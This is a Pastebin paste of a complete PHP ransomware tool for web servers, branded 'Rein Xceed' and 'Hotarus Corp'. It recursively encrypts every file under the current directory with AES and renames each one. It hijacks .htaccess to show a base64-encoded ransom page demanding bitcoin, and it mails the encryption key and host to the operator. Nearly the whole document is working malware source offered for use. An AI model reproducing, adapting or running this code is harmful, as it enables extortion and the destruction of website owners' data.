1ZRR4H

Rein Xceed #Ransomware [Webserver+Tool]

Feb 24th, 2021
1,593
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>Hotarus Corp - Ransomware</title>
  5. <style type="text/css">
  6. body {
  7. background: #1A1C1F;
  8. color: #e2e2e2;
  9. }
  10. .inpute{
  11. border-style: dotted;
  12. border-color: #379600;
  13. background-color: transparent;
  14. color: white;
  15. text-align: center;
  16. }
  17. .selecte{
  18. border-style: dotted;
  19. border-color: green;
  20. background-color: transparent;
  21. color: green;
  22. }
  23. .submite{
  24. border-style: dotted;
  25. border-color: #4CAF50;
  26. background-color: transparent;
  27. color: white;
  28. }
  29. .result{
  30. text-align: left;
  31. }
  32. </style>
  33. <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
  34. </head>
  35. <body>
  36. <div class="result">
  37. <?php
  38. error_reporting(0);
  39. set_time_limit(0);
  40. ini_set('memory_limit', '-1');
  41. class deRanSomeware
  42. {
  43. public function shcpackInstall(){
  44. if(!file_exists(".htarein")){
  45. rename(".htaccess", ".htarein");
  46. if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex reinxceed.php\r\nErrorDocument 404 /reinxceed.php")){
  47. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
  48. }
  49. if(file_put_contents("reinxceed.php", base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgPHRpdGxlPkhvdGFydXMgQ29ycC48L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgpib2R5IHsKICAgIGJhY2tncm91bmQ6ICMwMDA7CiAgICBjb2xvcjogI2ZmZjsKfQphewogICBjb2xvcjpyZWQ7Cn0KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGNlbnRlcj4KPHByZT4KCgooICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC9AQCYmJSAgICAgICgmQCZAJiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgIC4gICAgICAgICAgICAgICAgICAgQEAmICAjQCYsICAgICAgICAgICAgICAgICAgLi4gICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgLCUmQEBAJSAgICAgICAgICAgICAgLiZAQEBAQC4gICAgICAgICAgICAgICxAQEAmJi8gICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAvQCYqICAgICAgICAlJiYmJUBALy5AQCNAJkAmLiAgICAgICAgQEAlICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgIEAmLCAgICAuJkBAICAgQEAjICAsQEAvICAlQEAsICAgICAmQC8gICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICgmQCAgIC9AQC4gIyYmJSAgICAgIChAJiYgICZAJSAgICMmJiAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAmQEBAI0BAJkBAJi4gICUmQCZAJi4gICVAQCYmJigmQEAmLiAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAoQEAmJSAgIEAmJkBAJkBAQCZAQC4gICpAJiYlICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgIC4mQCYmLiAgICZAJiUgLkBALCAmQC8gKEBAQC4gICAjQEBAKiAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICxAQEAoICAgICVAJiUgICAgQCYqICAgJiYqICAgKCZAJiAgICAsQCZAKCAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICBAJkAvICAgICpAQCYgICAgICBAJiwgICAgIEAmKiAgICAgJUBAJiAgICAuJkAmLiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAuQEAmICAgICAmQEAqICAgICAgLkAmLCAgICAgICBAQC8gICAgICAuQEAmLiAgICAoQCYoICAgICAgICAgICAgIAogICAgICAgICAgICAgICYmQCAgICAgQEAmICAgICAgICAsQEAuICAgICAgICAgQCYlICAgICAgICAmQEAsICAgICMmJiAgICAgICAgICAgIAogICAgICAgICAgICAgQCYoICAgICZAJiAgICAgICAgICUmQEAqICAgICAgICAuQEBAQCAgICAgICAgICUmQCAgICAuJkAsICAgICAgICAgIAogICAgICAgICAgICBAQCwgICAuQEAqICAgICAgICAjQEAqICZAJiAgICAgICZAJiAuQEAmICAgICAgICAgQEAoICAgICZAKCAgICAgICAgIAogICAgICAgICAgLEAmICAgICwmQCAgICAgICAuJkBALiAgICAgJkAlICAqJkAqICAgICAmJkAvICAgICAgICYmJiAgICAmJiggICAgICAgIAogICAgICAgICAuQEAsICAgLkBALiAgICwmQEBALyAgICAgICAgIC9AQEBAJSAgICAgICAgICwmQEBAKiAgICAmQC8gICAgQEAoICAgICAgIAogICAgICAgIC4mQC4gICAgJiYmJiZAQCYsICAgICAgICAgICAgICAmQEAmLCAgICAgICAgICAgICAuJUBAQCYlQEAgICAgICZALyAgICAgIAogICAgICAgIEAmKi4jQEAmJkAlICAgICAgICAgICAgICAgICAgJiYmIyomQEAgICAgICAgICAgICAgICAgICAoJkBAJkAlLiAmQCogICAgIAogICAgICAgQCZAQCYvICAuJkAgICAgICAgICAgICAgICAgICYmQCMgICAgKkBAJi4gICAgICAgICAgICAgICAgQCYlICAqJUAmQEAuICAgIAogICAgICAgICAgICAgICAoQCYgICAgICAgICAgICAgICAmQEAmICAgICAgICAjQEBALCAgICAgICAgICAgICAgI0AmICAgICAgICAgICAgIAogICAgICAgICAgICAgICAlQCUgICAgICAgICAgICAqQEBAQCggICAgICAgICAgICZAQEAjICAgICAgICAgICAgKkAmICAgICAgICAgICAgIAogICAgICAgICAgICAgICAmJiMgICAgICAgICAgJUBALyUmIyAgICAgICAgICAgIComQCxAJkAuICAgICAgICAgLkBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAJiMgICAgICAgL0BAJiAgIC8mJiAgICAgICAgICAgICUmJiAgICZAQCUgICAgICAgIEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAQCMgICAgLEAmQCogICAgICAvJkAvICAgICAgICAuJkAlICAgICAgICZAQCggICAgIEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAQCMgKkAmJi8gICAgICAgICAgICwmQEBAJkAmQCYmKCAgICAgICAgICAgLkAmQCMgIEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICBAQEBAQCogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLkBAQEBAICAgICAgICAgICAgIAogICAgICAgICAgICAgICAsIy4gICAgICAgICZALCAgICAgICAgICAgICAgICAgICAgICAgICZALCAgICAgICAgICgoICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qICAgICAgICAgICAgICAoLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMoICAgICAqQCYgICAgICAlLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIApAKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAsJiYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoKVHUgc2l0aW8gZnVlIHNlY3Vlc3RyYWRvIHBvciB1biBSQU5TT01XQVJFICBkZSBIb3RhcnVzIENvcnAuIGNvbnRhY3RhIGNvbiBub3NvdHJvcyBwYXJhIHNvcG9ydGU6CiAgICAgLVsgPGZvbnQgY29sb3I9InJlZCI+aG90YXJ1c3RlYW1AcHJvdG9ubWFpbC5jb208L2ZvbnQ+IF0tCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KUXVlIGVzIHVuIDxhIGhyZWY9Imh0dHBzOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JhbnNvbXdhcmUiPlJhbnNvbXdhcmU8L2E+Ljxicj4KUXVpZXJlcyByZWN1cGVyYXIgdHUgc2l0aW8gd2ViPwpUaWVuZXMgcXVlIHBhZ2FyIDI1MCBEb2xhcmVzIEFtZXJpY2Fub3MgZW4gQklUQ09JTlMKTnVtZXJvIGRlIGN1ZW50YTogPGZvbnQgY29sb3I9IiNmZmNhMjUiPmJjMXE1bm00dTR3d2MzZ3FkbDczYW42eGhjanc0YzRndWQ2bTI0NHpuZTwvZm9udD4KPC9wcmU+CjwvY2VudGVyPgo8L2JvZHk+CjwvaHRtbD4="))){
  50. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> reinxceed.php (Default Page)<br>';
  51. }
  52. }
  53. }
  54. public function shcpackUnstall(){
  55.  
  56. if( file_exists(".htarein") ){
  57. if( unlink(".htaccess") && unlink("reinxceed.php") ){
  58. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
  59. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> reinxceed.php (Default Page)<br>';
  60. }
  61. rename(".htarein", ".htaccess");
  62. }
  63.  
  64. }
  65.  
  66. public function plus(){
  67. flush();
  68. ob_flush();
  69. }
  70. public function locate(){
  71. return getcwd();
  72. }
  73. public function shcdirs($dir,$method,$key){
  74. switch ($method) {
  75. case '1':
  76. deRanSomeware::shcpackInstall();
  77. break;
  78. case '2':
  79. deRanSomeware::shcpackUnstall();
  80. break;
  81. }
  82. foreach(scandir($dir) as $d)
  83. {
  84. if($d!='.' && $d!='..')
  85. {
  86. $locate = $dir.DIRECTORY_SEPARATOR.$d;
  87. if(!is_dir($locate)){
  88. if( deRanSomeware::kecuali($locate,"ReinXceed.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"reinxceed.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htarein") ){
  89. switch ($method) {
  90. case '1':
  91. deRanSomeware::shcEnCry($key,$locate);
  92. deRanSomeware::shcEnDesDirS($locate,"1");
  93. break;
  94. case '2':
  95. deRanSomeware::shcDeCry($key,$locate);
  96. deRanSomeware::shcEnDesDirS($locate,"2");
  97. break;
  98. }
  99. }
  100. }else{
  101. deRanSomeware::shcdirs($locate,$method,$key);
  102. }
  103. }
  104. deRanSomeware::plus();
  105. }
  106. deRanSomeware::report($key);
  107. }
  108.  
  109. public function report($key){
  110. $message.= "========= Rein Xceed =========\n";
  111. $message.= "Website : ".$_SERVER['HTTP_HOST'];
  112. $message.= "Key : ".$key;
  113. $message.= "========= Rein Xceed (2020) Ransomware =========\n";
  114. $subject = "Report Ransomeware";
  115. $headers = "From: Ransomware <ransomeware@shor7cut.today>\r\n";
  116. mail("-- YOUR EMAIL --",$subject,$message,$headers);
  117. }
  118.  
  119. public function shcEnDesDirS($locate,$method){
  120. switch ($method) {
  121. case '1':
  122. rename($locate, $locate.".reinxceed");
  123. break;
  124. case '2':
  125. $locates = str_replace(".reinxceed", "", $locate);
  126. rename($locate, $locates);
  127. break;
  128. }
  129. }
  130.  
  131. public function shcEnCry($key,$locate){
  132. $data = file_get_contents($locate);
  133. $iv = mcrypt_create_iv(
  134. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
  135. MCRYPT_DEV_URANDOM
  136. );
  137.  
  138. $encrypted = base64_encode(
  139. $iv .
  140. mcrypt_encrypt(
  141. MCRYPT_RIJNDAEL_128,
  142. hash('sha256', $key, true),
  143. $data,
  144. MCRYPT_MODE_CBC,
  145. $iv
  146. )
  147. );
  148. if(file_put_contents($locate, $encrypted )){
  149. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
  150. }else{
  151. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
  152. }
  153. }
  154.  
  155. public function shcDeCry($key,$locate){
  156. $data = base64_decode( file_get_contents($locate) );
  157. $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  158.  
  159. $decrypted = rtrim(
  160. mcrypt_decrypt(
  161. MCRYPT_RIJNDAEL_128,
  162. hash('sha256', $key, true),
  163. substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
  164. MCRYPT_MODE_CBC,
  165. $iv
  166. ),
  167. "\0"
  168. );
  169. if(file_put_contents($locate, $decrypted )){
  170. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
  171. }else{
  172. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
  173. }
  174. }
  175.  
  176.  
  177.  
  178. public function kecuali($ext,$name){
  179. $re = "/({$name})/";
  180. preg_match($re, $ext, $matches);
  181. if($matches[1]){
  182. return false;
  183. }
  184. return true;
  185. }
  186. }
  187.  
  188. if($_POST['submit']){
  189. switch ($_POST['method']) {
  190. case '1':
  191. deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']);
  192. break;
  193. case '2':
  194. deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']);
  195. break;
  196. }
  197. }else{
  198. ?>
  199. <center>
  200. <pre>
  201. (
  202. /@@&&% (&@&@&
  203. . @@& #@&, ..
  204. ,%&@@@% .&@@@@@. ,@@@&&/
  205. /@&* %&&&%@@/.@@#@&@&. @@%
  206. @&, .&@@ @@# ,@@/ %@@, &@/
  207. (&@ /@@. #&&% (@&& &@% #&&
  208. &@@@#@@&@@&. %&@&@&. %@@&&&(&@@&.
  209. (@@&% @&&@@&@@@&@@. *@&&%
  210. .&@&&. &@&% .@@, &@/ (@@@. #@@@*
  211. ,@@@( %@&% @&* &&* (&@& ,@&@(
  212. @&@/ *@@& @&, @&* %@@& .&@&.
  213. .@@& &@@* .@&, @@/ .@@&. (@&(
  214. &&@ @@& ,@@. @&% &@@, #&&
  215. @&( &@& %&@@* .@@@@ %&@ .&@,
  216. @@, .@@* #@@* &@& &@& .@@& @@( &@(
  217. ,@& ,&@ .&@@. &@% *&@* &&@/ &&& &&(
  218. .@@, .@@. ,&@@@/ /@@@@% ,&@@@* &@/ @@(
  219. .&@. &&&&&@@&, &@@&, .%@@@&%@@ &@/
  220. @&*.#@@&&@% &&&#*&@@ (&@@&@%. &@*
  221. @&@@&/ .&@ &&@# *@@&. @&% *%@&@@.
  222. (@& &@@& #@@@, #@&
  223. %@% *@@@@( &@@@# *@&
  224. &&# %@@/%&# *&@,@&@. .@@
  225. @&# /@@& /&& %&& &@@% @@
  226. @@# ,@&@* /&@/ .&@% &@@( @@
  227. @@# *@&&/ ,&@@@&@&@&&( .@&@# @@
  228. @@@@@* .@@@@@
  229. ,#. &@, &@, ((
  230. /* (.
  231. #( *@& %/
  232. @* ,&&
  233. HOTARUS CORP
  234. -[ Contact : hotarusteam@protonmail.com ]-
  235. </pre>
  236. <form action="" method="post" style=" text-align: center;">
  237. <label>Key : </label>
  238. <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
  239. <select name="method" class="selecte">
  240. <option value="1">Secuestrar</option>
  241. <option value="2">Liberar</option>
  242. </select>
  243. <input type="submit" name="submit" class="submite" value="Submit" />
  244. </form>
  245. <?php
  246. }?>
  247. </div>
  248. </body>
  249. </html>
  250.  
  251.  
  252. <?php
  253.  
  254. ?>
RAW Paste Data